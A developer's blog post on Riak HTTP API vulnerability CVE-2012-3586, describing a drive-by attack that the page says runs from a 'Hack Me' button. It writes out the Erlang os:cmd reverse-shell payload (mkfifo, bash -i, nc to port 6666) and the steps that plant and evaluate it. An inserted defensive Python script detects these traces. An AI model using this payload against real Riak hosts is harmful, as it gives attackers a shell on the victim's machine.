Ben's Blog

Developer Musings

Riak Drive by Attack

Be careful with Riak HTTP API (CVE-2012-3586)

This has been fixed in Riak 1.1.4.

I would recommend not running the Riak HTTP API on a machine that you browse the internet on or on a machine that is reachable by machines that can browse the internet.

This is heavily based on Aphyr’s work. I’ve taken his work and used it in a cross-site scripting attack. When you click the ‘Hack Me’ button, your Riak process will attempt to connect to localhost:6666. If you run nc -l 6666 and wait for a connection, you will have a shell with the privileges of the user running Riak.

The attack will perform the following actions:

  1. Write the value lols=lols to the key i_can_run_better in bucket everything_you_can_run
  2. Write the value spawn(fun() -> os:cmd("mkfifo /tmp/mypipe.$$ && cat /tmp/mypipe.$$ | /bin/bash -i 2>&1 | nc localhost 6666 > /tmp/mypipe.$$") end) to the file /tmp/evil.erl
  3. Evaluate the contents of /tmp/evil.erl using the Erlang function file:path_eval. This will cause your machine to try to open a connection to localhost:6666 that is backed by a shell running under the riak user.
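A defender's triage check for the traces the three steps above leave on a Riak host, added here as an example and not part of the original post: it parses a process listing in the layout of ps -eo user,pid,ppid,args for the interactive bash and nc-to-6666 chain running as the Riak account, and flags the named pipe and /tmp/evil.erl in a /tmp listing. The account name riak, the ps column layout and both sample listings are assumptions constructed for the example.

```python
import re

RIAK_USER = "riak"  # assumed name of the account the Riak node runs as

# Indicators taken from the attack steps described above.
FIFO_RE = re.compile(r"^/tmp/mypipe\.\d+$")                    # mkfifo /tmp/mypipe.$$
DROPPED_FILE = "/tmp/evil.erl"                                  # file given to file:path_eval
SHELL_CMD_RE = re.compile(r"(/bin/bash -i|\bnc\b.*\b6666\b)")  # pieces of the shell chain


def suspicious_processes(ps_output, riak_user=RIAK_USER):
    """Parse text laid out like `ps -eo user,pid,ppid,args` and return the rows
    where the riak account runs an interactive bash or an nc to port 6666."""
    hits = []
    for line in ps_output.strip().splitlines()[1:]:  # first line is the header
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, ppid, args = parts
        if user == riak_user and SHELL_CMD_RE.search(args):
            hits.append({"pid": int(pid), "ppid": int(ppid), "args": args})
    return hits


def suspicious_tmp_entries(entries):
    """entries: iterable of (path, is_fifo) pairs, e.g. built from os.lstat over /tmp.
    Flags the named pipe the attack creates and the dropped Erlang source file."""
    return [path for path, is_fifo in entries
            if (is_fifo and FIFO_RE.match(path)) or path == DROPPED_FILE]


# Constructed process listing for demonstration; not captured from a real host.
SAMPLE_PS = """USER PID PPID ARGS
root 1 0 /sbin/init
riak 2345 1 /usr/lib/riak/erts-5.9/bin/beam.smp -- -root /usr/lib/riak
riak 2400 2345 sh -c mkfifo /tmp/mypipe.2400 && cat /tmp/mypipe.2400 | /bin/bash -i 2>&1 | nc localhost 6666 > /tmp/mypipe.2400
riak 2402 2400 /bin/bash -i
riak 2403 2400 nc localhost 6666
ben 3000 1 nc -l 6666
"""

# Constructed /tmp listing: (path, is_fifo).
SAMPLE_TMP = [("/tmp/mypipe.2400", True), ("/tmp/evil.erl", False),
              ("/tmp/tmp.XyZ123", False), ("/tmp/mypipe.bak", True)]

if __name__ == "__main__":
    for hit in suspicious_processes(SAMPLE_PS):
        print("suspicious process:", hit)
    print("suspicious /tmp entries:", suspicious_tmp_entries(SAMPLE_TMP))
```

The listener on port 6666 in the sample belongs to a different account and is deliberately not flagged; the check is scoped to what the Riak account itself spawns.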

By clicking ‘Hack Me’ you agree that you have reviewed the source code of this page and understand what the attack will do and will not hold the author of this page liable for any damage the attack may cause.

Click ‘Hack Me’ below to start the attack.